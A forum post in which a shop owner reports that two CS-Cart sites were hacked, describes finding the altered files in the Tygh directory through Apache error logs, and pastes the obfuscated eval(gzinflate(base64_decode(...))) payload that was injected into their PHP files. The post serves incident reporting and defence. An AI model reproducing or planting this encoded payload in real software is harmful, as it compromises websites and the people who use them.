Two of my sites were hacked today.
One is running 4.1.3 the other 4.1.5.
Development sites running on the same server were not hacked, and the hacks resulted in “500 Server Error” and were thus not functional.
I am therefore thinking that this is a front end attack, not shell access.
The files modified were all in Tygh directory. You can identify the exact files hacked by going through the apache2 error.log and seeing which file breaks the server (eg. Database.php). This is what is appended to the first line of the affected php files:
<br />
<?php eval(gzinflate(base64_decode('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')));?><br />
```<br />
<br />
I am running PHP 5.5 and Apache 2.4 and presently have mod_security disabled. That is getting corrected as I speak.